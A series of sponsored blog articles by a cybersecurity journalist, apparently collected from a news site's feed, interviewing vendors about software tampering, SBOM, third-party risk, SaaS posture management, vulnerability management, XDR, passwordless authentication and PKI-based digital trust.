It’s not difficult to visualize how companies interconnecting to cloud resources at a breakneck pace contribute to the outward expansion of their networks’ attack surface.

Related: Why ‘SBOM’ is gaining traction

If that wasn’t bad enough, the attack surface companies must defend is expanding inwardly, as well – as software tampering at a deep level escalates.

The Solar Winds breach and the disclosure of the massive Log4J vulnerability have put company decision makers on high alert with respect to this freshly-minted exposure. Findings released this week by ReversingLabs show 87 percent of security and technology professionals view software tampering as a new breach vector of concern, yet only 37 percent say they have a way to detect it across their software supply chain.

I had a chance to discuss software tampering with Tomislav Pericin, co-founder and chief software architect of ReversingLabs, a Cambridge, MA-based vendor that helps companies granularly analyze their software code. For a full drill down on our discussion please give the accompanying podcast a listen. Here are the big takeaways:

‘Dependency confusion’

Much of the discussion at RSA Conference 2022, which convenes next week in San Francisco, will boil down to slowing attack surface expansion. This now includes paying much closer attention to the elite threat actors who are moving inwardly to carve out fresh vectors taking them deep inside software coding.

The perpetrators of the Solar Winds breach, for instance, tampered with a build system of the widely-used Orion network management tool. They then were able to trick some 18,000 companies into deploying an authentically-signed Orion update carrying a heavily-obfuscated backdoor.

Log4J, aka Log4Shell, refers to a gaping vulnerability that exists in an open-source logging library that’s deeply embedded within servers and applications all across the public Internet. Its function is to record events in a log for a system administrator to review and act upon. Left unpatched, Log4Shell, presents a ripe opportunity for a bad actor to carry out remote code execution attacks, Pericin told me.

This type of attack takes advantage of the highly dynamic, ephemeral way software interconnects to make modern digital services possible.

Pericin

“As we go about defining layers on top of layers of application code, understanding all the interdependencies becomes very complex,” Pericin told me. “You really need to go deep into all of these layers to be able to understand if there’s any hidden behaviors or unaccounted for code that introduce risk in any of the layers.”

Obfuscated tampering

Dependency confusion can arise anytime a developer reaches out to a package repository. Modern software is built on pillars of open-source components, and package repositories offer an easy access to the wealth of pre-built code that makes development faster. However, not all of that code is safe to use. Capitalizing on dependency confusion, threat actors seek ways to insert malicious elements; and they take intricate steps to obfuscate their code tampering. Most often their objective is to install a back door through which they can come and go – and take full control of the underlying system anytime they please, Pericin says.

Last year, white hat researcher Alex Birsan shed a bright light on just how big an opportunity this presents to malicious hackers. Birsan demonstrated how dependency confusion attacks could be leveraged to tamper with coding deep inside of system software at Apple, PayPal, Tesla, Netflix, Uber, Shopify and Yelp!.

Then in late April, ReversingLabs and other vendors shared stunning evidence of such attacks moving beyond the theoretical and into live service. A red team of security researchers dissected a dependency confusion campaign aimed at taking control of the networks of leading media, logistics and industrial firms in Germany.

The basic definition of software tampering, Pericin notes, is to insert unverified code into the authorized code base. In the current, operating environment, there’s limitless opportunity to tamper with code. This is because such a high premium is put on agility.

“There are many places in the software supply chain where you can add unverified code, and the attackers are actually doing that,” Pericin says. “And that’s also why it can be so hard to detect.”

Implementing SBOM

Even as their organizations push more operations out to the Internet edge, senior executives are starting to realize that their internal attack surface is riddled with security holes, as well. Some 98 percent of the respondents to the ReversingLabs poll acknowledged that software supply chain risks are rising – due to their intensive use of built-on third party code and open source code. However, only 51 percent believed they could prevent their software from being tampered with.

For its part, ReversingLabs supplies an advanced code scanning and analysis service, called Software Assurance, that can help companies verify that its applications haven’t been tampered with. Software developers at large shops are getting into the habit of using this tool to deeply scan software packages as a final quality check, just before deployment, Pericin told me.

Some companies are going so far as using this tool to selectively scan mission-critical software arriving from smaller houses and independent developers for behavioral oddities, as well, he says.

Having the ability to granularly scan code also plays well with the drive to mainstream SBOM, which stands for Software Bill of Materials.

SBOM is an industry effort to standardize the documentation of a complete list of authorized components in a software application.

President Biden’s cybersecurity executive order, issued in May, includes a detailed SBOM requirement for all software delivered to the federal government.

And now advanced scanning tools, like those supplied by ReversingLabs, are ready for prime time – to help companies detect and deter software tampering, as well as implement SBOM as a standard practice.

“One of the outcomes of doing this analysis is you gain the ability to correctly identify what’s present in the software package, which is the software bill of materials,” Pericin observes.

In today’s environment, organizations need to figure out how to secure their external edge, that’s for certain. But it’s equally important to account for their internal edge, to stop software tampering in its tracks. It’s encouraging that the technology to do that is available. I’ll keep watch and keep reporting.

Acohido

Pulitzer Prize-winning business journalist Byron V. Acohido is dedicated to fostering public awareness about how to make the Internet as private and secure as it ought to be.


(LW provides consulting services to the vendors we cover.)

 

 

Third-Party Risk Management (TPRM) has been around since the mid-1990s – and has become something of an auditing nightmare.

Related: A call to share risk assessments

Big banks and insurance companies instilled the practice of requesting their third-party vendors to fill out increasingly bloated questionnaires, called bespoke assessments, which they then used as their sole basis for assessing third-party risk.

TPRM will be in the spotlight at the RSA Conference 2022 next week in San Francisco. This is because third-party risk has become a huge problem for enterprises in the digital age. More so than ever, enterprises need to move beyond check-the-box risk assessments; there’s a clear and present need to proactively mitigate third-party risks.

The good news is that TPRM solution providers are innovating to meet this need, as will be showcased at RSA. One leading provider is Denver, Colo.-based CyberGRX. I had the chance to sit down with their CISO, Dave Stapleton, to learn more about the latest advancements in TPRM security solutions. For a full drill down of our discussion, please give the accompanying podcast a listen. Here are key takeaways:

Smoothing audits

CyberGRX launched in 2016 precisely because bespoke assessments had become untenable. Questionnaires weren’t standardized, filling them out and collecting them had become a huge burden, and any truly useful analytics just never happened.

“Sometimes you’d get a 500-question questionnaire and that would be one out of 5,000 you’d get over the course of a year,” Stapleton says, referring to a scenario that a large payroll processing company had to deal with.

CyberGRX created an online exchange to serve as a clearinghouse where assessments could be more efficiently – and usefully – administered. Digital transformation had taken hold; so their timing was pitch perfect.

“Usage of third-party vendors has escalated exponentially in the past 10 years, and businesses also rely on them for more sensitive and critical activities,” Stapleton noted.

Moving the questionnaires to an exchange model meant introducing a standardized crowdsourcing approach to compiling and making available what was previously bespoke assessment data. This also made remediation – i.e. getting third-party vendors to mitigate potential risks and maintain compliance with audit benchmarks – much smoother.

Stapleton

This alone was a huge improvement. “The exchange model has been quite revolutionary,” Stapleton says. “We were able to reduce the level of effort for both third parties and their customers. Third parties get fewer requests so they can focus more time and energy on security; customers have one place they can go to get the data they need.”

Cyber risks profiling

CyberGRX’s global cyber risk Exchange caught on quickly. But, the company founders never intended to stop at simply cleaning up bespoke  assessments. The exchange has proven to be a perfect mechanism for fleshing out much richer cyber risk profiles of third-party vendors. It does this by ingesting and correlating data from a wide array of security-related  datasets.

This folds in fresh intelligence that goes far beyond the ground covered in traditional bespoke assessments, which are merely the starting point. Questionnaire answers get cross referenced against cybersecurity best practice protocols put out by the National Institute of Standards and Technology, namely NIST 800-53 and NIST 800-171.

CyberGRX is also able to leverage real-time threat intelligence feeds by partnering with leading threat intelligence vendors. These vendors integrate their abilities to monitor malware circulation and cyber-attack activity in real time within the Exchange platform, including staying alert for any signs of third-party vendor cyber assets turning up in murky parts of the Dark Web.

Another function of the Exchange is to analyze a third-party vendor’s “firmographics” – publicly known details such as geographic location, industry type, target markets, business performance and organizational structure. So contextual industry background and fresh threat landscape intel gets continually infused into traditional audit findings. Stapleton characterizes this as “cyber risk intelligence” profiling.

“The idea behind it is that this is a process of collecting the right data, creating your own quality data and performing very complex analysis in order to produce actionable results,” he says.

Cyber hygiene boost

This enrichment of the check-the-box approach to third-party risk assessments is paying off on a number levels, he says. Material productivity gains derive from risk managers on both sides spending much less time mucking with bespoke audits. “”Our methodology provides security and risk professionals with next-level insights that empower them to quickly make decisions in regards to risk management. Therefore, spending less time on mitigating risks and more time focusing on other important initiatives”,” Stapleton says.

More nuanced benefits accrue, as well. For instance, as more substantive vetting of third-party vendors gains traction, the overall level of supply chain cyber hygiene gets boosted. Third parties quickly discover that checking boxes isn’t going to be enough; first-party enterprises gain clarity, in a very practical sense, on security practices they need to prioritize.

Observes Stapleton:  “It’s a combination of capabilities that produces something that is truly actionable, specifically for the purposes of improving third party risk management outcomes.”

The ceiling for strengthening security postures – of third parties and first parties alike — is high. For instance, Stapleton described for me how CyberGRX can now correlate firmographics to threat intel feeds and audit data to provide innovative new services that were unheard of just a couple of years ago.

For one, the exchange can now reliably predict how a vendor will respond to a risk assessment without having them input any information. Thus, an enterprise can weigh whether to accept a given supplier — without necessarily administering a full-blown assessment audit.

For another, the exchange is continually improving its capacity to granularly gauge a third-party vendor’s exposure to a high-profile vulnerability or even a certain type of exploit known to be circulating in the wild.

“We can map to something like the MITRE ATT&CK framework and perform an analysis that tells you which of your third parties are most likely to be vulnerable to something like Log4J.”

What’s more, advanced third-party risk mitigation can also help offset the cybersecurity skills shortage. “We’re putting our security professionals back to work instead of filling out spreadsheets,” Stapleton asserts, “and we’re giving enterprises information they can use to start working with their third parties today to improve security of the supply chain.”

This is one part of igniting a virtuous cycle. New cloud-centric security frameworks, like Zero Trust Network Access (ZTNA) and Secure Access Services Edge (SASE) Access, and new security tools – to advance detection and response, as well as properly configure all cyber assets —  must take hold as well. I’ll keep watch and keep reporting.

Acohido

Pulitzer Prize-winning business journalist Byron V. Acohido is dedicated to fostering public awareness about how to make the Internet as private and secure as it ought to be.


(LW provides consulting services to the vendors we cover.)

 

Companies have come to depend on Software as a Service – SaaS — like never before.

Related: Managed security services catch on

From Office 365 to Zoom to Salesforce.com, cloud-hosted software applications have come to make up the nerve center of daily business activity. Companies now reach for SaaS apps for clerical chores, conferencing, customer relationship management, human resources, salesforce automation, supply chain management, web content creation and much more, even security.

This development has intensified the pressure on companies to fully engage in the “shared responsibility” model of cybersecurity, a topic in that will be in the limelight at RSA Conference 2022 next week in San Francisco.

I visited with Maor Bin, co-founder and CEO of Tel Aviv-based Adaptive Shield, a pioneer in a new security discipline referred to as SaaS Security Posture Management (SSPM.) SSPM is part of emerging class of security tools that are being ramped up to help companies dial-in SaaS security settings as they should have started doing long ago.

This fix is just getting under way. For a full drill down, please give the accompanying podcast a listen. Here are the key takeaways:

Shrugging off security

A sharp line got drawn in the sand, some years ago, when Amazon Web Services (AWS) took the lead in championing the shared responsibility security model.

To accelerate cloud migration, AWS, Microsoft Azure and Google Cloud guaranteed that the hosted IT infrastructure they sought to rent to enterprises would be security-hardened – at least on their end. For subscribers, the tech giants issued a sprawling set of security settings for their customers’ security teams to monkey with. It was left up to each company to dial-in just the right amount of security-vs-convenience.

SaaS vendors, of course, readily adopted the shared responsibility model pushed out by the IT infrastructure giants. Why wouldn’t they? Thus, the burden was laid squarely on company security teams to harden cloud-connections on their end.

Bin

What happened next was predictable. Caught up in chasing the productivity benefits of cloud computing, many companies looked past  doing any security due diligence, Bin says.

Security teams ultimately were caught flat-footed, he says. Security analysts had gotten accustomed to locking down servers and applications that were on premises and within their arms’ reach. But they couldn’t piece together the puzzle of how to systematically configure myriad overlapping security settings scattered across dozens of SaaS applications.

The National Institute of Standards and Technology recognized this huge security gap for what it was, and issued NIST 800-53 and NIST 800-171 –detailed criteria for securely configuring cloud connections. But many companies simply shrugged off the NIST protocols.

“It turned out to be very hard for security teams to get control of SaaS applications,” Bin observes.  “First of all, there was a lack of any knowledge base inside companies and often times the owner of the given SaaS app wasn’t very cooperative.”

SaaS due diligence

Threat actors, of course, didn’t miss their opportunity. Wave after wave of successful exploits took full advantage of the misconfigurations spinning out of cloud migration. Fraudulent cash transfers, massive ransomware payouts, infrastructure and supply chain disruptions all climbed to new heights. And malicious hackers attained deep, unauthorized access left and right. Every CISO should, by now, cringe at the thought of his or her organization becoming the next Capital One or Solar Winds or Colonial Pipeline.

At RSA Conference 2022, which opens next week in San Francisco, the buzz will be around the good guys finally getting their act together and pushing back. For instance, an entire cottage industry of cybersecurity vendors has ramped up specifically to help companies improve their cloud “security posture management.”

This includes advanced cloud access security broker (CASB) and cyber asset attack surface management (CAASM) tools.  SSPM solutions, like Adaptive Shield’s, are among the newest and most innovative tools. Other categories getting showcased at RSAC 2022 include cloud security posture management (CSPM) and application security posture management (ASPM) technologies.

For its part, Adaptive Shield supplies a solution designed to provide full visibility and control of every granular security configuration in some 70 SaaS applications now used widely by enterprises. This can range from dozens to hundreds of security toggles, per application, controlling things like privileged access, multi-factor authentication, phishing protection, digital key management, auditing and much more.

Tools at hand

Security teams now have the means to methodically filter through and make strategic adjustments of each and every SaaS security parameter. Misconfigurations – i.e. settings that don’t meet NIST best practices — can be addressed immediately, or a service ticket can be created and sent on its way.

“I like to call this SaaS security hygiene,” Bin says. “It’s a way to align your users, your devices and your third-party applications with different activities and different privileges. Misconfigurations is huge part of it, but it’s just one of the moving parts of securing your SaaS.”

Doing this level of SaaS security due diligence on a consistent basis is clearly something well worth doing and something that needs to become standard practice. It will steadily improve an organization’s cloud security policies over time; and it should also promote security awareness and reinforce security best practices far beyond the security team, namely to the users of the apps.

Company by company this will slow the expansion of the attack surface, perhaps even start to help shrink the attack surface over time. Things are moving in a good direction. I’ll keep watch and keep reporting.

Acohido

Pulitzer Prize-winning business journalist Byron V. Acohido is dedicated to fostering public awareness about how to make the Internet as private and secure as it ought to be.


(LW provides consulting services to the vendors we cover.)

Vulnerability management, or VM, has long been an essential, if decidedly mundane, component of network security.

Related: Log4J’s long-run risks

That’s changing — dramatically. Advanced VM tools and practices are rapidly emerging to help companies mitigate a sprawling array of security flaws spinning out of digital transformation.

I visited with Scott Kuffer, co-founder and chief operating officer of Sarasota, FL-based Nucleus Security, which is in the thick of this development. Nucleus launched in 2018 and has grown to over 50 employees. It supplies a unified vulnerability and risk management solution that automates vulnerability management processes and workflows.

We discussed why VM has become acutely problematic yet remains something that’s vital for companies to figure out how to do well, now more so than ever. For a full drill down, please give the accompanying podcast a listen. Here are the key takeaways:

Multiplying exposures

Scan and patch. Historically, this has been what VM was all about. Microsoft’s Patch Tuesday speaks to the never-ending flow of freshly discovered software flaws — and the software giant’s best efforts ease the burden of mitigating them.

Scan-and-patch systems from Tenable, Qualys, Rapid7, Checkmarx and others came along and became indispensable; enterprises could use these tools to keep software bugs and security holes patched at a tolerable level; not just flaws in Microsoft code, of course, but software from all of their suppliers, internal and external.

However, that scan-and-patch equilibrium is no more. Digital transformation has spawned a cascade of nuanced, abstract vulnerabilities – and they’re everywhere. This results from companies chasing after agile software development and cloud-centric innovations, above all else. In aggressively leveraging digital services to achieve productivity gains they’ve also exponentially multiplied security gaps across a steadily expanding network attack surface.

“There are configuration weaknesses in cloud resources, vulnerabilities that need patching,  like Log4J, and vulnerabilities in the business logic of old code,” Kuffer observes. “There are many different types of these vulnerabilities, and it’s a matter of figuring out who owns them and how to fix them quickly, and, also, which ones to fix.”

Current threat landscape

So, what exactly constitutes a vulnerability these days? As Kuffer alluded to not long into our discussion, it goes far beyond the bug fixes and security patches that Microsoft, Oracle, Adobe and every supplier of business software distributes periodically.

Kuffer

A vulnerability, simply put, is a coding weakness by which software can be manipulated in a way that was never intended. Today, these exposures lurk not just in the legacy enterprise apps – the ones that need continually patching – they’re turning up even more so in the cloud-hosted storage buckets, virtual servers and Software-as-a-Service (SaaS) subscriptions that have become the heart of IT operations.

It all starts with DevOps, under which agile software is being pushed out based on the principle of continuous integration and continuous delivery (CI/CD.) Much heralded, CI/CD is a set of principles said to result in the delivery new software frequently and reliably.

Truthfully, CI/CD really is nothing more than an updated version rushing shrink-wrapped boxes of new apps to store shelves. Remember when early adopters were giddy to receive the bug-riddled version 1.0 of a cool new app, anticipating that major bugs would get fixed in 1.1, 1.2 etc.?

Under CI/CD, developers collaborate remotely to press new code into live service as fast as possible and count on making iterative fixes on the fly.

This fail-fast imperative often leverages cloud storage and virtual servers; code development revolves around interconnecting modular microservices and software containers scattered all across public and private clouds.

To malicious hackers this translates into a candy store of fresh vulnerabilities. In many ways it’s easier than ever for threat actors to get deep access, steal data, spread ransomware, disrupt infrastructure and attain long run unauthorized access.

Unified solution

All of that said, it’s not so much the agile software trend, in and of itself, that’s to blame. Security gaps generally — and vulnerabilities specifically — have surpassed the tolerable level in large part because companies have not paid nearly enough attention to configuring their public cloud and hybrid cloud IT systems. In short, software interconnections are skewed toward agility.

Fine tuning is in order and there’s really no mystery how to go about dialing in the necessary measure of security. Robust data security frameworks have been painstakingly assembled and vetted by the National Institute of Standards and Technology (NIST.) However, adhering to NIST 800-53 and NIST 800-171 is voluntary and, for whatever reasons, far too many enterprises have yet to fully embrace robust data security best practices.

To illustrate, Kuffer pointed me to the all-too-common scenario where a company goes live with an AWS root account that uses a default password to access all of it its EC2 virtual servers and S3 storage buckets. “That misconfiguration is a vulnerability because anybody who finds that password and then logs in to your AWS account has full admin control over your entire cloud infrastructure,” he says.

This kind of thing can be rectified by adopting risk-assessment principles alongside CD/CI. And the good news, Kuffer says, is that the cybersecurity industry is driving towards helping companies get better at systematically identifying, analyzing and controlling vulnerabilities. Nucleus Security refers to this as a shift towards “.”

Risk-tolerance security

VM done from a risk-assessment lens boils down to enterprises making a concerted effort to discover and thoughtfully inventory all of the coding flaws and misconfigurations inhabiting their increasingly cloud-centric networks, and then doing triage based on risk-tolerance principles.

This absolutely can be done, ironically, because cybersecurity vendors themselves are innovating off the strengths of cloud resources and agile software. At RSA Conference 2022 opening next week in San Francisco, there will be considerable buzz around new tools and frameworks that empower companies to discover and inventory software bugs and misconfigurations, cost-effectively and at scale.

This includes a host of leading-edge technologies supporting emerging frameworks such cyber asset attack surface management (CAASM,) cloud security posture management (CSPM,) application security posture management (ASPM,) and even software-as-a-service security posture management (SSPM.)

Specialized analytics platforms — like those from Nucleus Security and other suppliers of advanced VM technologies – fit in by enabling companies to ingest security posture snapshots from all quarters, Kuffer says. Advanced VM systems are designed to efficiently implement and enforce wise policy, without unduly disrupting agility, he says.

Clearly, the frameworks and technology are ready for prime time. If the continuing ransomware scourge and widening supply chain hacks tell us anything, it’s that it’s high time for companies to dial back on agility and dial in more security. I’ll keep watch and keep reporting.

Acohido

Pulitzer Prize-winning business journalist Byron V. Acohido is dedicated to fostering public awareness about how to make the Internet as private and secure as it ought to be.


(LW provides consulting services to the vendors we cover.)

According to recent data from Oracle and KPMG, organizations today employ over 100 cybersecurity products to secure their environments. These products play essential roles in detecting and preventing threats.

Related: Taking a ‘risk-base’ approach to security compliance

However, because they generate thousands of alerts every day, this vast sprawl of security sources adds even more work to already over-stretched security teams. It could create a cybersecurity ticking time bomb.

Many organizations have recently undertaken rapid digital transformations in response to the ongoing pandemic and a societal shift toward a “work from anywhere” future. This hybrid model has created exciting opportunities for employees and organizations and significantly raised the security stakes.

Most combine the cloud, Office 365, and Active Directory to store and transfer sensitive corporate data, and they need security solutions to protect their entire environment as it grows and evolves. The once “protective perimeter” surrounding enterprise IT has dissolved, transforming it from a closed environment into one that spans far and wide with copious entry points.

To address this security challenge, organizations are deploying more security products today. This seems to be creating new problems in vendor sprawl, further burdening security teams with more to do. The challenge is that disparate vendors do not represent data in the same way, so there is no correlation between dashboards and metrics.

When organizations have two or three security platforms protecting their environment, security teams must toggle between them and make sense of disparate data sets. This often results in a lack of clarity, inhibiting them from seeing the big picture of what is really happening in their security environment. This is why cyber gangs tend to favor layered attacks. They’re harder to identify across disparate security data sets.

Espinosa

All security technologies have their own alerting systems, requirements for patches and updates, integration needs, user nuances, policy management processes, access control, reporting, etc. This can become overwhelming for security teams, often understaffed and under-resourced, resulting in missed alerts – some insignificant but critical.

Too many tools, too little time

So, how best to overcome this challenge? As organizations’ environments continue expanding, how best to improve security across the entire infrastructure without creating vendor sprawl or overburdening security teams?

One tool picking up prominence is Extended Detection and Response (XDR.)

XDR is one of the latest acronyms to hit the cyber dictionary, and it is a new approach to threat detection and response. It provides holistic protection against cyberattacks across an organization’s entire digital estate, including endpoints, applications, networks, and cloud environments.

While the tool is often confused with Managed Detection and Response (MDR), Security Information and Event Management (SIEM), and Endpoint Detection and Response (EDR), it is very different as it builds upon each offering, rolling them into a single package to help organizations better secure their environments as digital transformation accelerates.

While EDR, MDR, and SIEM provide visibility into specific areas, by choosing just one, organizations are not necessarily improving their overall security posture against potential attack vectors because visibility is still limited to only the area that the solution is monitoring.

With EDR, the solution only looks for threats or security issues impacting organizations’ endpoints. Historically, when organizations’ primary attack vectors were PCs, this would have provided adequate security. However, attacks target multiple different sources today, so threat hunting and protection must secure everything.

XDR meets evolving security needs

Rather than deploying multiple tools from multiple security vendors, XDR combines endpoint, network, applications, and cloud architecture monitoring and response capabilities into one platform, allowing better correlation of security events and freeing security teams from vendor sprawl. With cyberattacks growing year-on-year, organizations simply do not have the manpower or resources to combat threats.

To bridge the gap, holes are plugged with new security products. While these are beneficial in threat detection, most products are from different vendors, which means there is no unified way to receive alerts. This results in strained security teams wasting time navigating through the mechanics of each security tool.

One of the best ways to overcome this issue is through XDR technology, the next evolution in threat detection and response. XDR’s capabilities protect organizations’ entire digital estates as they grow beyond the safety of its perimeter.

XDR can replace multiple toolsets and alerting systems into single, integrated solutions and provide rapid response against threats targeting all organizational infrastructure. Security teams can then identify and investigate alerts quickly from a single source without overburdening them before threats can harm businesses.

About the essayist: Christian Espinosa is the managing director of Cerberus Sentinel a Managed Compliance and Cybersecurity Provider (MCCP) with its exclusive MCCP+ managed compliance and cybersecurity services plus culture program. He also is the best-selling author of “The Smartest Person in the Room.”  Espinosa came to Cerberus Sentinel after the company acquired Alpine Security, a cybersecurity consulting and managed services company he founded. He also has been a white hat hacker and a certified high-performance coach.  

Google, Microsoft and Apple are bitter arch-rivals who don’t often see eye-to-eye.

Related: Microsoft advocates regulation of facial recognition tools

Yet, the tech titans recently agreed to adopt a common set of standards supporting passwordless access to websites and apps.

This is one giant leap towards getting rid of passwords entirely. Perhaps not coincidently, it comes at a time when enterprises have begun adopting passwordless authentication systems in mission-critical parts of their internal operations.

Excising passwords as the security linchpin to digital services is long, long overdue. It may take a while longer to jettison them completely, but now there truly is a light at the end of the tunnel.

I recently sat down with Ismet Geri, CEO of Veridium, to discuss what the passwordless world we’re moving towards might be like. For a full drill down on our wide-ranging discussion, please give a listen to the accompanying podcast. Here are a few takeaways.

Security + efficiency

Passwordless technology is certainly ready for prime time; innovative solutions from suppliers like Cisco’s Duo, Hypr, OneLogin and Veridium have been steadily gaining traction in corporate settings for the past few years.

And the pace of adoption is quickening, Geri told me. Companies in the throes of digital transformation, and especially post Covid19, have never been more motivated to adapt a new authentication paradigm – one that eliminates shared secrets.

Password abuse at scale arose shortly after the decision got made in the 1990s to make shared secrets the basis for securing digital connections. Fortifications, such as multi-factor authentication (MFA) and password managers, proved to be mere speed bumps. Threat actors now routinely bypass these second-layer security gates.

No small part of the problem is that passwords and MFA require a significant amount of human interaction. “Relying on shared secrets doesn’t work anymore, because we have too many accounts and no one can remember hundreds of passwords.” Geri says. “Our brains just won’t do it.”

As companies accelerate their dependence on hosted cloud services, the clunkiness of passwords and MFA is exacting a toll on productivity. One bank in the U.S. Northeast, for instance, was concerned about tellers having to type-in their passwords 50 or more times a day. “They wanted to make their tellers’ work life easier, more friendly and seamless, and at the same time improve security,” Geri says.

This was accomplished by using web cameras at each terminal tied into Veridium facial recognition software. Instead of the teller having to type in a username and password, then also use a second-factor of authentication over and over, access now happens silently and swiftly based on who the teller is. Thus, the bank measurably reduced its exposure to password abuse, while also lightening the burden on each teller.

Adoption scenarios

Geri

Outside of the banking industry, which strictly prohibits the use of BYOD smartphones for tellers, many organizations have begun adopting passwordless solutions by leveraging their employees’ personally-owned smartphones. Passwordless access to company resources goes something like this: Instead of a logon prompt asking for a username and password, the employee gets presented with a QR Code.

He or she simply uses his or her smartphone to scan the QR code. A phone app then uses the onboard biometric sensor, either fingerprint or facial, to authenticate the employee to the company’s server. “The most common adoption scenario that we see is companies seeking a passwordless experience across all of their applications,” Geri says.

Talk about turning Bring Your Own Device security concerns on its head. Passwordless solutions now enable companies to turn BYOD into a strategic tool. When you consider how password abuse has grown into a full-blown criminal specialty, it’s easy to measure the security gained from shutting down password abuse vectors.

The efficiency gain comes from reducing logon sprawl; today employees are required to repeatedly type-in a username and password, then also use various forms of MFA to connect to the company network, to log onto cloud-hosted productivity and collaboration tools, as well as to access operational software.

Coming advances

In short, what’s happening is that companies are shifting to passwordless authenticators because they materially improve security, but also leverage tools like a smartphone which is far less likely to be left behind or misplaced.

Google, Microsoft and Apple now get this. After a decade of sitting on the fence, the tech giants on May 5 announced that they would formally adopt standards pulled together by the FIDO Alliance.

FIDO stands for Fast IDentity Online. It’s a fresh set of industry standards, akin to WiFi and Bluetooth, that encourages the development and use of passwordless authenticators. Any device manufacturer, software developer or online service provider can integrate FIDO protocols and policies into their products and services.

Whatever their ulterior motives, Google, Microsoft and Apple should be congratulated for finally seeing the light. They’ve dispatched spokesmen to herald the “eliminating the vulnerability of passwords” and tout “making passwordless part of consumer lives” and “completing the shift to a passwordless world.” Maybe the tech giants finally noticed the train leaving and thought it wise to jump on board.

For its part, Veridium launched in 2016 with a laser focus on designing passwordless systems from scratch that directly addressed the growing frustration of IT department and security team leaders.

Attaining ‘recognition’

Geri told me that Veridium is already three years into development of a major advance – technology that can take into account behavioral biometrics, such as the pattern of hand movement a person habitually uses when using a fingerprint or iris sensor.

By remembering nuances about movements and other behavior traits over time, this technology will make Veridium’s platform swifter and surer about authenticating a user, Geri told me.

“It’s a concept I call recognition,” he says. “Behavior patterns combined with a strong authentication asset, which is your biometrics, could get us very close to starting to recognize you.”

More such advances are coming. How they get used in a global sense remains to be seen.

Will passwordless authenticators serve mainly to tighten the iron grip that the social media giants hold on consumers’ online personas? Or could these advances foster a fresh trend, one that supports a more fair distribution of wealth, say like the mainstreaming of self-sovereign identities? We’re destined to soon find out. I’ll keep watch and keep reporting.

Acohido

Pulitzer Prize-winning business journalist Byron V. Acohido is dedicated to fostering public awareness about how to make the Internet as private and secure as it ought to be.

Modern digital systems simply could not exist without trusted operations, processes and connections. They require integrity, authentication, trusted identity and encryption.

Related: Leveraging PKI to advance electronic signatures

It used to be that trusting the connection between a workstation and a mainframe computer was the main concern. Then the Internet took off and trusting the connection between a user’s device and a web server became of paramount importance.

Today we’re in the throes of digital transformation. Software-defined-everything is the order of the day. Our smart buildings, smart transportation systems and smart online services are all network-connected at multiple levels. Digital services get delivered across a complex amalgam of public cloud, hybrid cloud and on-premises digital systems.

It is against this backdrop that digital trust has become paramount. We simply must attain —  and sustain — a high bar of confidence in the computing devices, software applications and data that make up he interconnected world we occupy.

And yet at this moment, digital trust isn’t where it needs to be on the boardroom priority list or the IT security team’s strategy. It remains all too common for threat actors to subvert connected ecosystems. This challenge has not escaped the global cybersecurity community. Largely out of the public’s eye, technologists from the private and public sectors are fully engaged in shaping the elements of digital trust that will safeguard our connected future.

Protocols and policies setting new parameters for trusted connections are being hammered out and advanced encryption, authentication and data protection solutions are being ramped up.

Failure is not an option. These efforts must result in a level of digital trust significantly higher than we have today if we are to have full confidence in digital services, going forward.

This was the main topic of discussion recently at DigiCert Security Summit 2022. I had the chance to talk about DigiCert’s perspective  with Jason Sabin, DigiCert’s Chief Technology Officer.

We discussed why elevating digital trust has become so vital. Here are a few key takeaways.

Trust under siege

Long gone are the days when a security team mainly had to be concerned about network connections getting made internally, on company-owned equipment, or externally, across a VPN connection or a public-facing webpage.

Today, software developers are king and agile software is their golden chalice. Developers stitch together modular microservices and software containers that tap into far-flung software-defined resources. This results in ephemeral connections firing off at a vast scale — humans-to-software and software-to-software – all across the Internet Cloud.

Trust is under siege. The challenge faced by a security team is to verify the authenticity of each connection and preserve the encryption, as needed, across a massive, sprawling attack surface.

And this is where digital trust comes in, with core implementations such as public key infrastructure (PKI), Sabin noted. PKI is the framework by which digital certificates get issued to authenticate the identity of users and devices; and it is also the plumbing for encrypting data that moves across the public Internet.

Most folks come into contact with the most visible subset of PKI — the TLS/SSL/HTTPS authentication and encryption protocol – each time they connect to a secured website.

However, PKI has engrained itself much more pervasively than that across the digital landscape. Over the past decade or so, companies have turned to using PKI to certify and secure many types of digital connections inside their private networks, as well.

Consider that just five years ago, a large enterprise was typically responsible for managing tens of thousands of digital certificates. Today that number for many organizations is pushing a million or more digital certificates, as digital transformation accelerates.

“There’s a massive shift unfolding very, very quickly,” Sabin told me.  “Trust has become the backbone of security and, as a result, companies are leveraging PKI technology to implement trust in all parts of their ecosystem, which basically comes down to issuing and managing a lot of digital certificates.”

Protocols, policies and PKI

The question then becomes: Is PKI robust enough to support the elevated level of digital trust that’s needed?

DigiCert and other security experts essentially argue that the answer is: PKI is ubiquitous, time tested and well-suited to leveraging automation. It can form a foundation of a larger digital trust strategy.

DigiCert, for instance, supplies advanced PKI management systems that can authenticate the identity of an individual, a business, a machine, a workload, a software container or a microservice. And automation already is being leveraged to assure that an object hasn’t been tampered with, as well as ensure the encryption of data in transit – at scale.

Advanced data security technologies, no matter how terrific, are just one piece of the puzzle. The security experts and thought leaders at DigiCert’s conference discussed the progress being made on a couple of other fronts: protocols and policies.

In order to achieve a level of digital trust needed to support great leaps forward, a fresh set of technical protocols, compliance benchmarks and supporting audits remain to be finalized and implemented.

The model for driving consensus of this sort has been laid out by the industry forums and consortiums that convened to give us the protocols and policies undergirding the public Internet. Many of these same groups remain active, like the CA/Browser Forum, which focuses on benchmarks for digital certificates, are actively hashing out new rules of the road.

Ssabin

“We have to think about how to extend trust to mobile devices and to IoT devices, and how to more effectively protect supply chains and critical infrastructure,” Sabin says. “We also must find ways to encourage high levels of compliance with industry standards and government regulations. This is all part of building trusted digital ecosystems.”

Everyone should realize what’s at stake here: smarter buildings, autonomous transportation systems, climate change remediation, medical breakthroughs.

As people spend larger chunks of their waking hours online, the boundary between personal and work connectivity has become fluid. Companies need come to view digital trust as a strategic imperative.

This challenge speaks to verifying the integrity of homespun and third-party software builds, firmware on connected devices and their trusted access, trustworthiness of documents and much more, Sabin says.

I agree.  And I’m encouraged that the work of prioritizing digital trust is well underway. I’ll keep watch and keep reporting.

Acohido

Pulitzer Prize-winning business journalist Byron V. Acohido is dedicated to fostering public awareness about how to make the Internet as private and secure as it ought to be.


(LW provides consulting services to the vendors we cover.)

 

The shift to software-defined everything and reliance on IT infrastructure scattered across the Internet has boosted corporate productivity rather spectacularly.

Related: Stopping attack surface expansion

